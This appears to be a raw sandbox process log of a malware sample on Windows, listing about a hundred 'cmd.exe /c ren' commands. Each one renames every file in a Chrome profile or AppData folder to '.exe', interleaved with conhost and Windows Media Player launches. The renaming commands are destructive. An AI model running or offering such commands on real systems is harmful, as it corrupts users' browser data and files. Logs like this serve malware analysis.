"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\802d6b00-90db-44ce-b9af-41d73536b55c\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\af\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\am\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ar\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\az\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\be\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\bn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\cy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\el\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\es_419\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\eu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fil\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fr_CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\gl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\gu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hu\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\is\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\iw\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ka\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\kk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\km\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\kn\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\unregmp2.exe

C:\Windows\system32\unregmp2.exe /ShowWMP /SetShowState /CreateMediaLibrary

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lt\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ml\*.*" "*.exe"

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /ShowWMP /SetShowState /CreateMediaLibrary /REENTRANT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\mn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\mr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ms\*.*" "*.exe"

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch

